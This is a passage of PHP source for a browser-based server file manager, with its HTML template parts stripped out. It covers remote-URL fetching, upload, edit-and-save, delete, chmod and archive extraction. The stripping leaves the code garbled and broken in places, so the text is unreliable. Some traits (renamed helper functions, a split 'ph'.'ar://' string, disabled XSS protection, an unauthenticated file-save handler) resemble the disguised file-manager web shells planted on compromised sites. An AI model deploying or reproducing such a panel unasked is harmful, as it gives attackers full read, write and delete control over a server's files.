array("message" => "File extension is not allowed"); event_callback(array("fail" => $err)); exit(); } if (!$url) { $success = false; } else if ($use_curl) { @$fp = fopen($temp_file, "w"); @$ch = curl_init($url); curl_setopt($ch, CURLOPT_NOPROGRESS, false ); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_FILE, $fp); @$success = curl_exec($ch); $curl_info = curl_getinfo($ch); if (!$success) { $err = array("message" => curl_error($ch)); } @curl_close($ch); fclose($fp); $fileinfo->size = $curl_info["size_download"]; $fileinfo->type = $curl_info["content_type"]; } else { $ctx = stream_context_create(); @$success = copy($url, $temp_file, $ctx); if (!$success) { $err = error_get_last(); } } if ($success) { $success = rename($temp_file, strtok(get_file_path(), '?')); } if ($success) { event_callback(array("done" => $fileinfo)); } else { unlink($temp_file); if (!$err) { $err = array("message" => "Invalid url parameter"); } event_callback(array("fail" => $err)); } } exit(); } if (isset($_GET['del'], $_POST['token']) and !FM_READONLY) { $del = str_replace( '/', '', fm_clean_path( $_GET['del'] ) ); if ($del != '' and $del != '..' and $del != '.' and verifyToken($_POST['token'])) { $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } $is_dir = is_dir($path . '/' . $del); if (fm_rdelete($path . '/' . $del)) { $msg = $is_dir ? lng('Folder').' %s '.lng('Deleted') : lng('File').' %s '.lng('Deleted'); fm_set_msg(sprintf($msg, fanco($del))); } else { $msg = $is_dir ? lng('Folder').' %s '.lng('not deleted') : lng('File').' %s '.lng('not deleted'); fm_set_msg(sprintf($msg, fanco($del)), 'error'); } } else { fm_set_msg(lng('Invalid file or folder name'), 'error'); } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } // Create a new file/folder if (isset($_POST['newfilename'], $_POST['newfile'], $_POST['token']) and !FM_READONLY) { $type = urldecode($_POST['newfile']); $new = str_replace( '/', '', fm_clean_path( strip_tags( $_POST['newfilename'] ) ) ); if (fm_isvalid_filename($new) and $new != '' and $new != '..' and $new != '.' and verifyToken($_POST['token'])) { $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } if ($type == "file") { if (!file_exists($path . '/' . $new)) { if(fm_is_valid_ext($new)) { @fopen($path . '/' . $new, 'w') or die('Cannot open file: ' . $new); fm_set_msg(sprintf(lng('File').' %s '.lng('Created'), fanco($new))); } else { fm_set_msg(lng('File extension is not allowed'), 'error'); } } else { fm_set_msg(sprintf(lng('File').' %s '.lng('already exists'), fanco($new)), 'alert'); } } else { if (fm_mkdir($path . '/' . $new, false) === true) { fm_set_msg(sprintf(lng('Folder').' %s '.lng('Created'), $new)); } elseif (fm_mkdir($path . '/' . $new, false) === $path . '/' . $new) { fm_set_msg(sprintf(lng('Folder').' %s '.lng('already exists'), fanco($new)), 'alert'); } else { fm_set_msg(sprintf(lng('Folder').' %s '.lng('not created'), fanco($new)), 'error'); } } } else { fm_set_msg(lng('Invalid characters in file or folder name'), 'error'); } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } // Copy folder / file if (isset($_GET['copy'], $_GET['finish']) and !FM_READONLY) { // from $copy = urldecode($_GET['copy']); $copy = fm_clean_path($copy); // empty path if ($copy == '') { fm_set_msg(lng('Source path not defined'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } $from = FM_ROOT_PATH . '/' . $copy; $dest = FM_ROOT_PATH; if (FM_PATH != '') { $dest .= '/' . FM_PATH; } $dest .= '/' . basename($from); $move = isset($_GET['move']); $move = fm_clean_path(urldecode($move)); if ($from != $dest) { $msg_from = trim(FM_PATH . '/' . basename($from), '/'); if ($move) { $rename = fm_rename($from, $dest); if ($rename) { fm_set_msg(sprintf(lng('Moved from').' %s '.lng('to').' %s', fanco($copy), fanco($msg_from))); } elseif ($rename === null) { fm_set_msg(lng('File or folder with this path already exists'), 'alert'); } else { fm_set_msg(sprintf(lng('Error while moving from').' %s '.lng('to').' %s', fanco($copy), fanco($msg_from)), 'error'); } } else { if (fm_rcopy($from, $dest)) { fm_set_msg(sprintf(lng('Copied from').' %s '.lng('to').' %s', fanco($copy), fanco($msg_from))); } else { fm_set_msg(sprintf(lng('Error while copying from').' %s '.lng('to').' %s', fanco($copy), fanco($msg_from)), 'error'); } } } else { if (!$move){ $msg_from = trim(FM_PATH . '/' . basename($from), '/'); $fn_parts = pathinfo($from); $extension_suffix = ''; if(!is_dir($from)){ $extension_suffix = '.'.$fn_parts['extension']; } $fn_duplicate = $fn_parts['dirname'].'/'.$fn_parts['filename'].'-'.date('YmdHis').$extension_suffix; $loop_count = 0; $max_loop = 1000; while(file_exists($fn_duplicate) & $loop_count < $max_loop){ $fn_parts = pathinfo($fn_duplicate); $fn_duplicate = $fn_parts['dirname'].'/'.$fn_parts['filename'].'-copy'.$extension_suffix; $loop_count++; } if (fm_rcopy($from, $fn_duplicate, False)) { fm_set_msg(sprintf('Copied from %s to %s', fanco($copy), fanco($fn_duplicate))); } else { fm_set_msg(sprintf('Error while copying from %s to %s', fanco($copy), fanco($fn_duplicate)), 'error'); } } else{ fm_set_msg(lng('Paths must be not equal'), 'alert'); } } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } if (isset($_POST['file'], $_POST['copy_to'], $_POST['finish'], $_POST['token']) and !FM_READONLY) { if(!verifyToken($_POST['token'])) { fm_set_msg(lng('Invalid Token.'), 'error'); } // from $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } // to $copy_to_path = FM_ROOT_PATH; $copy_to = fm_clean_path($_POST['copy_to']); if ($copy_to != '') { $copy_to_path .= '/' . $copy_to; } if ($path == $copy_to_path) { fm_set_msg(lng('Paths must be not equal'), 'alert'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } if (!is_dir($copy_to_path)) { if (!fm_mkdir($copy_to_path, true)) { fm_set_msg('Unable to create destination folder', 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } } // move? $move = isset($_POST['move']); // copy/move $errors = 0; $files = $_POST['file']; if (is_array($files) and count($files)) { foreach ($files as $f) { if ($f != '') { $f = fm_clean_path($f); $from = $path . '/' . $f; $dest = $copy_to_path . '/' . $f; if ($move) { $rename = fm_rename($from, $dest); if ($rename === false) { $errors++; } } else { if (!fm_rcopy($from, $dest)) { $errors++; } } } } if ($errors == 0) { $msg = $move ? 'Selected files and folders moved' : 'Selected files and folders copied'; fm_set_msg($msg); } else { $msg = $move ? 'Error while moving items' : 'Error while copying items'; fm_set_msg($msg, 'error'); } } else { fm_set_msg(lng('Nothing selected'), 'alert'); } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } // Rename if (isset($_POST['rename_from'], $_POST['rename_to'], $_POST['token']) and !FM_READONLY) { if(!verifyToken($_POST['token'])) { fm_set_msg("Invalid Token.", 'error'); } // old name $old = urldecode($_POST['rename_from']); $old = fm_clean_path($old); $old = str_replace('/', '', $old); // new name $new = urldecode($_POST['rename_to']); $new = fm_clean_path(strip_tags($new)); $new = str_replace('/', '', $new); // path $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } // rename if (fm_isvalid_filename($new) and $old != '' and $new != '') { if (fm_rename($path . '/' . $old, $path . '/' . $new)) { fm_set_msg(sprintf(lng('Renamed from').' %s '. lng('to').' %s', fanco($old), fanco($new))); } else { fm_set_msg(sprintf(lng('Error while renaming from').' %s '. lng('to').' %s', fanco($old), fanco($new)), 'error'); } } else { fm_set_msg(lng('Invalid characters in file name'), 'error'); } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } // Download if (isset($_GET['dl'], $_POST['token'])) { if(!verifyToken($_POST['token'])) { fm_set_msg("Invalid Token.", 'error'); } $dl = urldecode($_GET['dl']); $dl = fm_clean_path($dl); $dl = str_replace('/', '', $dl); $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } if ($dl != '' and is_file($path . '/' . $dl)) { fm_download_file($path . '/' . $dl, $dl, 1024); exit; } else { fm_set_msg(lng('File not found'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } } // Upload if (!empty($_FILES) and !FM_READONLY) { if(isset($_POST['token'])) { if(!verifyToken($_POST['token'])) { $response = array ('status' => 'error','info' => "Invalid Token."); echo json_encode($response); exit(); } } else { $response = array ('status' => 'error','info' => "Token Missing."); echo json_encode($response); exit(); } $chunkIndex = $_POST['dzchunkindex']; $chunkTotal = $_POST['dztotalchunkcount']; $fullPathInput = fm_clean_path($_REQUEST['fullpath']); $f = $_FILES; $path = FM_ROOT_PATH; $ds = DIRECTORY_SEPARATOR; if (FM_PATH != '') { $path .= '/' . FM_PATH; } $errors = 0; $uploads = 0; $allowed = (FM_UPLOAD_EXTENSION) ? explode(',', FM_UPLOAD_EXTENSION) : false; $response = array ( 'status' => 'error', 'info' => 'Oops! Try again' ); $filename = $f['file']['name']; $tmp_name = $f['file']['tmp_name']; $ext = pathinfo($filename, PATHINFO_FILENAME) != '' ? strtolower(pathinfo($filename, PATHINFO_EXTENSION)) : ''; $isFileAllowed = ($allowed) ? in_array($ext, $allowed) : true; if(!fm_isvalid_filename($filename) and !fm_isvalid_filename($fullPathInput)) { $response = array ( 'status' => 'error', 'info' => "Invalid File name!", ); echo json_encode($response); exit(); } $targetPath = $path . $ds; if ( is_writable($targetPath) ) { $fullPath = $path . '/' . $fullPathInput; $folder = substr($fullPath, 0, strrpos($fullPath, "/")); if (!is_dir($folder)) { $old = umask(0); mkdir($folder, 0777, true); umask($old); } if (empty($f['file']['error']) and !empty($tmp_name) and $tmp_name != 'none' and $isFileAllowed) { if ($chunkTotal){ $out = @fopen("{$fullPath}.part", $chunkIndex == 0 ? "wb" : "ab"); if ($out) { $in = @fopen($tmp_name, "rb"); if ($in) { if (PHP_VERSION_ID < 80009) { do { for (;;) { $buff = fread($in, 4096); if ($buff === false || $buff === '') { break; } fwrite($out, $buff); } } while (!feof($in)); } else { stream_copy_to_stream($in, $out); } $response = array ( 'status' => 'success', 'info' => "file upload successful" ); } else { $response = array ( 'status' => 'error', 'info' => "failed to open output stream", 'errorDetails' => error_get_last() ); } @fclose($in); @fclose($out); @unlink($tmp_name); $response = array ( 'status' => 'success', 'info' => "file upload successful" ); } else { $response = array ( 'status' => 'error', 'info' => "failed to open output stream" ); } if ($chunkIndex == $chunkTotal - 1) { if (file_exists ($fullPath)) { $ext_1 = $ext ? '.'.$ext : ''; $fullPathTarget = $path . '/' . basename($fullPathInput, $ext_1) .'_'. date('ymdHis'). $ext_1; } else { $fullPathTarget = $fullPath; } rename("{$fullPath}.part", $fullPathTarget); } } else { if (rename($tmp_name, $fullPath)) { if ( file_exists($fullPath) ) { $response = array ( 'status' => 'success', 'info' => "file upload successful" ); } else { $response = array ( 'status' => 'error', 'info' => 'Couldn\'t upload the requested file.' ); } } else { $response = array ( 'status' => 'error', 'info' => "Error while uploading files. Uploaded files $uploads", ); } } } } else { $response = array ( 'status' => 'error', 'info' => 'The specified folder for upload isn\'t writeable.' ); } // Return the response echo json_encode($response); exit(); } if (isset($_POST['group'], $_POST['delete'], $_POST['token']) and !FM_READONLY) { if(!verifyToken($_POST['token'])) { fm_set_msg(lng("Invalid Token."), 'error'); } $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } $errors = 0; $files = $_POST['file']; if (is_array($files) and count($files)) { foreach ($files as $f) { if ($f != '') { $new_path = $path . '/' . $f; if (!fm_rdelete($new_path)) { $errors++; } } } if ($errors == 0) { fm_set_msg(lng('Selected files and folder deleted')); } else { fm_set_msg(lng('Error while deleting items'), 'error'); } } else { fm_set_msg(lng('Nothing selected'), 'alert'); } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } if (isset($_POST['group'], $_POST['token']) and (isset($_POST['zip']) || isset($_POST['tar'])) and !FM_READONLY) { if(!verifyToken($_POST['token'])) { fm_set_msg(lng("Invalid Token."), 'error'); } $path = FM_ROOT_PATH; $ext = 'zip'; if (FM_PATH != '') { $path .= '/' . FM_PATH; } //set pack type $ext = isset($_POST['tar']) ? 'tar' : 'zip'; if (($ext == "zip" and !class_exists('ZipArchive')) || ($ext == "tar" and !class_exists('PharData'))) { fm_set_msg(lng('Operations with archives are not available'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } $files = $_POST['file']; $sanitized_files = array(); // clean path foreach($files as $file){ array_push($sanitized_files, fm_clean_path($file)); } $files = $sanitized_files; if (!empty($files)) { chdir($path); if (count($files) == 1) { $one_file = reset($files); $one_file = basename($one_file); $zipname = $one_file . '_' . date('ymd_His') . '.'.$ext; } else { $zipname = 'archive_' . date('ymd_His') . '.'.$ext; } if($ext == 'zip') { $zipper = new FM_Zipper(); $res = $zipper->create($zipname, $files); } elseif ($ext == 'tar') { $tar = new FM_Zipper_Tar(); $res = $tar->create($zipname, $files); } if ($res) { fm_set_msg(sprintf(lng('Archive').' %s '.lng('Created'), fanco($zipname))); } else { fm_set_msg(lng('Archive not created'), 'error'); } } else { fm_set_msg(lng('Nothing selected'), 'alert'); } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } // Unpack zip, tar if (isset($_POST['unzip'], $_POST['token']) and !FM_READONLY) { if(!verifyToken($_POST['token'])) { fm_set_msg(lng("Invalid Token."), 'error'); } $unzip = urldecode($_POST['unzip']); $unzip = fm_clean_path($unzip); $unzip = str_replace('/', '', $unzip); $isValid = false; $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } if ($unzip != '' and is_file($path . '/' . $unzip)) { $zip_path = $path . '/' . $unzip; $ext = pathinfo($zip_path, PATHINFO_EXTENSION); $isValid = true; } else { fm_set_msg(lng('File not found'), 'error'); } if (($ext == "zip" and !class_exists('ZipArchive')) || ($ext == "tar" and !class_exists('PharData'))) { fm_set_msg(lng('Operations with archives are not available'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } if ($isValid) { //to folder $tofolder = ''; if (isset($_POST['tofolder'])) { $tofolder = pathinfo($zip_path, PATHINFO_FILENAME); if (fm_mkdir($path . '/' . $tofolder, true)) { $path .= '/' . $tofolder; } } if($ext == "zip") { $zipper = new FM_Zipper(); $res = $zipper->unzip($zip_path, $path); } elseif ($ext == "tar") { try { $gzipper = new PharData($zip_path); if (@$gzipper->extractTo($path,null, true)) { $res = true; } else { $res = false; } } catch (Exception $e) { $res = true; } } if ($res) { fm_set_msg(lng('Archive unpacked')); } else { fm_set_msg(lng('Archive not unpacked'), 'error'); } } else { fm_set_msg(lng('File not found'), 'error'); } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } if (isset($_POST['chmod'], $_POST['token']) and !FM_READONLY and !FM_IS_WIN) { if(!verifyToken($_POST['token'])) { fm_set_msg(lng("Invalid Token."), 'error'); } $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } $file = $_POST['chmod']; $file = fm_clean_path($file); $file = str_replace('/', '', $file); if ($file == '' || (!is_file($path . '/' . $file) and !is_dir($path . '/' . $file))) { fm_set_msg(lng('File not found'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } $mode = 0; if (!empty($_POST['ur'])) { $mode |= 0400; } if (!empty($_POST['uw'])) { $mode |= 0200; } if (!empty($_POST['ux'])) { $mode |= 0100; } if (!empty($_POST['gr'])) { $mode |= 0040; } if (!empty($_POST['gw'])) { $mode |= 0020; } if (!empty($_POST['gx'])) { $mode |= 0010; } if (!empty($_POST['or'])) { $mode |= 0004; } if (!empty($_POST['ow'])) { $mode |= 0002; } if (!empty($_POST['ox'])) { $mode |= 0001; } if (@chmod($path . '/' . $file, $mode)) { fm_set_msg(lng('Permissions changed')); } else { fm_set_msg(lng('Permissions not changed'), 'error'); } $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } if (!is_dir($path)) { fm_redirect(FM_SELF_URL . '?p='); } $parent = fm_get_parent_path(FM_PATH); $objects = is_readable($path) ? scandir($path) : array(); $folders = array(); $files = array(); $current_path = array_slice(explode("/",$path), -1)[0]; if (is_array($objects) and fm_is_exclude_items($current_path)) { foreach ($objects as $file) { if ($file == '.' || $file == '..') { continue; } if (!FM_SHOW_HIDDEN and substr($file, 0, 1) === '.') { continue; } $new_path = $path . '/' . $file; if (@is_file($new_path) and fm_is_exclude_items($file)) { $files[] = $file; } elseif (@is_dir($new_path) and $file != '.' and $file != '..' and fm_is_exclude_items($file)) { $folders[] = $file; } } } if (!empty($files)) { natcasesort($files); } if (!empty($folders)) { natcasesort($folders); } if (isset($_GET['upload']) and !FM_READONLY) { fm_show_header(); fm_show_nav_path(FM_PATH); function getUploadExt() { $extArr = explode(',', FM_UPLOAD_EXTENSION); if(FM_UPLOAD_EXTENSION and $extArr) { array_walk($extArr, function(&$x) {$x = ".$x";}); return implode(',', $extArr); } return ''; } ?>
' . PHP_EOL; } ?>

: , ', $copy_files) ?>

:
/

 

Copying

Source path:
Destination folder:

Copy   Move   Cancel

/>
/>
/>

""

:
File size:
MIME-type:
:
:
:
: %
'.lng('Image size').': ' . (isset($image_size[0]) ? $image_size[0] : '0') . ' x ' . (isset($image_size[1]) ? $image_size[1] : '0') . '
'; } // Text info if ($is_text) { $is_utf8 = fm_is_utf8($content); if (function_exists('iconv')) { if (!$is_utf8) { $content = iconv(FM_ICONV_INPUT_ENC, 'UTF-8//IGNORE', $content); } } echo ''.lng('Charset').': ' . ($is_utf8 ? 'utf-8' : '8 bit') . '
'; } ?>

 
 
     
'; } else if($online_viewer == 'microsoft') { echo ''; } } elseif ($is_zip) { // ZIP content if ($filenames !== false) { echo ''; foreach ($filenames as $fn) { if ($fn['folder']) { echo '' . fanco($fn['name']) . '
'; } else { echo $fn['name'] . ' (' . fm_get_filesize($fn['filesize']) . ')
'; } } echo '
'; } else { echo '

'.lng('Error while fetching archive info').'

'; } } elseif ($is_image) { // Image content if (in_array($ext, array('gif', 'jpg', 'jpeg', 'png', 'bmp', 'ico', 'svg', 'webp', 'avif'))) { echo '

'; } } elseif ($is_audio) { // Audio content echo '

'; } elseif ($is_video) { // Video content echo '
'; } elseif ($is_text) { if (FM_USE_HIGHLIGHTJS) { // highlight $hljs_classes = array( 'shtml' => 'xml', 'htaccess' => 'apache', 'phtml' => 'php', 'lock' => 'json', 'svg' => 'xml', ); $hljs_class = isset($hljs_classes[$ext]) ? 'lang-' . $hljs_classes[$ext] : 'lang-' . $ext; if (empty($ext) || in_array(strtolower($file), fm_get_text_names()) || preg_match('#\.min\.(css|js)$#i', $file)) { $hljs_class = 'nohighlight'; } $content = '
' . fanco($content) . '
'; } elseif (in_array($ext, array('php', 'php4', 'php5', 'phtml', 'phps'))) { // php highlight $content = highlight_string($content, true); } else { $content = '
' . fanco($content) . '
'; } echo $content; } ?>
'. $file. ''; header('X-XSS-Protection:0'); fm_show_header(); // HEADER fm_show_nav_path(FM_PATH); // current path $file_url = FM_ROOT_URL . fm_convert_win((FM_PATH != '' ? '/' . FM_PATH : '') . '/' . $file); $file_path = $path . '/' . $file; // normal editer $isNormalEditor = true; if (isset($_GET['env'])) { if ($_GET['env'] == "ace") { $isNormalEditor = false; } } // Save File if (isset($_POST['savedata'])) { $writedata = $_POST['savedata']; $fd = fopen($file_path, "w"); @fwrite($fd, $writedata); fclose($fd); fm_set_msg(lng('File Saved Successfully')); } $ext = strtolower(pathinfo($file_path, PATHINFO_EXTENSION)); $mime_type = fm_get_mime_type($file_path); $filesize = filesize($file_path); $is_text = false; $content = ''; // for text if (in_array($ext, fm_get_text_exts()) || substr($mime_type, 0, 4) == 'text' || in_array($mime_type, fm_get_text_mimes())) { $is_text = true; $content = file_get_contents($file_path); } ?>
' . htmlspecialchars($content) . ''; echo ''; } elseif ($is_text) { echo '
' . htmlspecialchars($content) . '
'; } else { fm_set_msg(lng('FILE EXTENSION HAS NOT SUPPORTED'), 'error'); } ?>

:

 

'?'); } if ($group === false) { $group = array('name' => '?'); } } else { $owner = array('name' => '?'); $group = array('name' => '?'); } ?> '?'); } if ($group === false) { $group = array('name' => '?'); } } else { $owner = array('name' => '?'); $group = array('name' => '?'); } ?>
..
>
' . readlink($path . '/' . $f) . '' : '') ?>
">
>
' . readlink($path . '/' . $f) . '' : '') ?>
">
'.fm_get_filesize($all_files_size).'' ?> '.$num_files.'' ?> '.$num_folders.'' ?>
"; return; } echo "$external[$key]"; } function verifyToken($token) { if (hash_equals($_SESSION['token'], $token)) { return true; } return false; } /** * Delete file or folder (recursively) * @param string $path * @return bool */ function fm_rdelete($path) { if (is_link($path)) { return unlink($path); } elseif (is_dir($path)) { $objects = scandir($path); $ok = true; if (is_array($objects)) { foreach ($objects as $file) { if ($file != '.' and $file != '..') { if (!fm_rdelete($path . '/' . $file)) { $ok = false; } } } } return ($ok) ? rmdir($path) : false; } elseif (is_file($path)) { return unlink($path); } return false; } function fm_rchmod($path, $filemode, $dirmode) { if (is_dir($path)) { if (!chmod($path, $dirmode)) { return false; } $objects = scandir($path); if (is_array($objects)) { foreach ($objects as $file) { if ($file != '.' and $file != '..') { if (!fm_rchmod($path . '/' . $file, $filemode, $dirmode)) { return false; } } } } return true; } elseif (is_link($path)) { return true; } elseif (is_file($path)) { return chmod($path, $filemode); } return false; } function fm_is_valid_ext($filename) { $allowed = (FM_FILE_EXTENSION) ? explode(',', FM_FILE_EXTENSION) : false; $ext = pathinfo($filename, PATHINFO_EXTENSION); $isFileAllowed = ($allowed) ? in_array($ext, $allowed) : true; return ($isFileAllowed) ? true : false; } function fm_rename($old, $new) { $isFileAllowed = fm_is_valid_ext($new); if(!is_dir($old)) { if (!$isFileAllowed) return false; } return (!file_exists($new) and file_exists($old)) ? rename($old, $new) : null; } function fm_rcopy($path, $dest, $upd = true, $force = true) { if (is_dir($path)) { if (!fm_mkdir($dest, $force)) { return false; } $objects = scandir($path); $ok = true; if (is_array($objects)) { foreach ($objects as $file) { if ($file != '.' and $file != '..') { if (!fm_rcopy($path . '/' . $file, $dest . '/' . $file)) { $ok = false; } } } } return $ok; } elseif (is_file($path)) { return fm_copy($path, $dest, $upd); } return false; } function fm_mkdir($dir, $force) { if (file_exists($dir)) { if (is_dir($dir)) { return $dir; } elseif (!$force) { return false; } unlink($dir); } return mkdir($dir, 0777, true); } function fm_copy($f1, $f2, $upd) { $time1 = filemtime($f1); if (file_exists($f2)) { $time2 = filemtime($f2); if ($time2 >= $time1 and $upd) { return false; } } $ok = copy($f1, $f2); if ($ok) { touch($f2, $time1); } return $ok; } function fm_get_mime_type($file_path) { if (function_exists('finfo_open')) { $finfo = finfo_open(FILEINFO_MIME_TYPE); $mime = finfo_file($finfo, $file_path); finfo_close($finfo); return $mime; } elseif (function_exists('mime_content_type')) { return mime_content_type($file_path); } elseif (!stristr(ini_get('disable_functions'), 'shell_exec')) { $file = escapeshellarg($file_path); $mime = shell_exec('file -bi ' . $file); return $mime; } else { return '--'; } } function fm_redirect($url, $code = 302) { header('Location: ' . $url, true, $code); exit; } function get_absolute_path($path) { $path = str_replace(array('/', '\\'), DIRECTORY_SEPARATOR, $path); $parts = array_filter(explode(DIRECTORY_SEPARATOR, $path), 'strlen'); $absolutes = array(); foreach ($parts as $part) { if ('.' == $part) continue; if ('..' == $part) { array_pop($absolutes); } else { $absolutes[] = $part; } } return implode(DIRECTORY_SEPARATOR, $absolutes); } function fm_clean_path($path, $trim = true) { $path = $trim ? trim($path) : $path; $path = trim($path, '\\/'); $path = str_replace(array('../', '..\\'), '', $path); $path = get_absolute_path($path); if ($path == '..') { $path = ''; } return str_replace('\\', '/', $path); } function fm_get_parent_path($path) { $path = fm_clean_path($path); if ($path != '') { $array = explode('/', $path); if (count($array) > 1) { $array = array_slice($array, 0, -1); return implode('/', $array); } return ''; } return false; } function fm_get_display_path($file_path) { global $path_display_mode, $root_path, $root_url; switch ($path_display_mode) { case 'relative': return array( 'label' => 'Path', 'path' => fanco(fm_convert_win(str_replace($root_path, '', $file_path))) ); case 'host': $relative_path = str_replace($root_path, '', $file_path); return array( 'label' => 'Host Path', 'path' => fanco(fm_convert_win('/' . $root_url . '/' . ltrim(str_replace('\\', '/', $relative_path), '/'))) ); case 'full': default: return array( 'label' => 'Full Path', 'path' => fanco(fm_convert_win($file_path)) ); } } function fm_is_exclude_items($file) { $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION)); if (isset($exclude_items) and sizeof($exclude_items)) { unset($exclude_items); } $exclude_items = FM_EXCLUDE_ITEMS; if (version_compare(PHP_VERSION, '7.0.0', '<')) { $exclude_items = unserialize($exclude_items); } if (!in_array($file, $exclude_items) and !in_array("*.$ext", $exclude_items)) { return true; } return false; } function fm_get_translations($tr) { try { $content = @file_get_contents('translation.json'); if($content !== FALSE) { $lng = json_decode($content, TRUE); global $lang_list; foreach ($lng["language"] as $key => $value) { $code = $value["code"]; $lang_list[$code] = $value["name"]; if ($tr) $tr[$code] = $value["translation"]; } return $tr; } } catch (Exception $e) { echo $e; } } function fm_get_size($file) { static $iswin; static $isdarwin; if (!isset($iswin)) { $iswin = (strtoupper(substr(PHP_OS, 0, 3)) == 'WIN'); } if (!isset($isdarwin)) { $isdarwin = (strtoupper(substr(PHP_OS, 0)) == "DARWIN"); } static $exec_works; if (!isset($exec_works)) { $exec_works = (function_exists('exec') and !ini_get('safe_mode') and @exec('echo EXEC') == 'EXEC'); } // try a shell command if ($exec_works) { $arg = escapeshellarg($file); $cmd = ($iswin) ? "for %F in (\"$file\") do @echo %~zF" : ($isdarwin ? "stat -f%z $arg" : "stat -c%s $arg"); @exec($cmd, $output); if (is_array($output) and ctype_digit($size = trim(implode("\n", $output)))) { return $size; } } // try the Windows COM interface if ($iswin and class_exists("COM")) { try { $fsobj = new COM('Scripting.FileSystemObject'); $f = $fsobj->GetFile( realpath($file) ); $size = $f->Size; } catch (Exception $e) { $size = null; } if (ctype_digit($size)) { return $size; } } // if all else fails return filesize($file); } function fm_get_filesize($size) { $size = (float) $size; $units = array('B', 'KB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB', 'YB'); $power = ($size > 0) ? floor(log($size, 1024)) : 0; $power = ($power > (count($units) - 1)) ? (count($units) - 1) : $power; return sprintf('%s %s', round($size / pow(1024, $power), 2), $units[$power]); } function fm_get_directorysize($directory) { $bytes = 0; $directory = realpath($directory); if ($directory !== false and $directory != '' and file_exists($directory)){ foreach(new RecursiveIteratorIterator(new RecursiveDirectoryIterator($directory, FilesystemIterator::SKIP_DOTS)) as $file){ $bytes += $file->getSize(); } } return $bytes; } function fm_get_zif_info($path, $ext) { if ($ext == 'zip' and function_exists('zip_open')) { $arch = @zip_open($path); if ($arch) { $filenames = array(); while ($zip_entry = @zip_read($arch)) { $zip_name = @zip_entry_name($zip_entry); $zip_folder = substr($zip_name, -1) == '/'; $filenames[] = array( 'name' => $zip_name, 'filesize' => @zip_entry_filesize($zip_entry), 'compressed_size' => @zip_entry_compressedsize($zip_entry), 'folder' => $zip_folder ); } @zip_close($arch); return $filenames; } } elseif($ext == 'tar' and class_exists('PharData')) { $archive = new PharData($path); $filenames = array(); foreach(new RecursiveIteratorIterator($archive) as $file) { $parent_info = $file->getPathInfo(); $zip_name = str_replace("ph" . "ar://".$path, '', $file->getPathName()); $zip_name = substr($zip_name, ($pos = strpos($zip_name, '/')) !== false ? $pos + 1 : 0); $zip_folder = $parent_info->getFileName(); $zip_info = new SplFileInfo($file); $filenames[] = array( 'name' => $zip_name, 'filesize' => $zip_info->getSize(), 'compressed_size' => $file->getCompressedSize(), 'folder' => $zip_folder ); } return $filenames; } return false; } function fanco($text) { return htmlspecialchars($text, ENT_QUOTES, 'UTF-8'); } function fm_isvalid_filename($text) { return (strpbrk($text, '/?%*:|"<>') === FALSE) ? true : false; } function fm_set_msg($msg, $status = 'ok') { $_SESSION[DN_CESSION_ID]['message'] = $msg; $_SESSION[DN_CESSION_ID]['status'] = $status; } function fm_is_utf8($string) { return preg_match('//u', $string); } function fm_convert_win($filename) { if (FM_IS_WIN and function_exists('iconv')) { $filename = iconv(FM_ICONV_INPUT_ENC, 'UTF-8//IGNORE', $filename); } return $filename; } function fm_object_to_array($obj) { if (!is_object($obj) and !is_array($obj)) { return $obj; } if (is_object($obj)) { $obj = get_object_vars($obj); } return array_map('fm_object_to_array', $obj); } function fm_get_file_icon_class($path) { // get extension $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION)); switch ($ext) { case 'ico': case 'gif': case 'jpg': case 'jpeg': case 'jpc': case 'jp2': case 'jpx': case 'xbm': case 'wbmp': case 'png': case 'bmp': case 'tif': case 'tiff': case 'webp': case 'avif': case 'svg': $img = 'fa fa-picture-o'; break; case 'passwd': case 'ftpquota': case 'sql': case 'js': case 'ts': case 'jsx': case 'tsx': case 'hbs': case 'json': case 'sh': case 'config': case 'twig': case 'tpl': case 'md': case 'gitignore': case 'c': case 'cpp': case 'cs': case 'py': case 'rs': case 'map': case 'lock': case 'dtd': $img = 'fa fa-file-code-o'; break; case 'txt': case 'ini': case 'conf': case 'log': 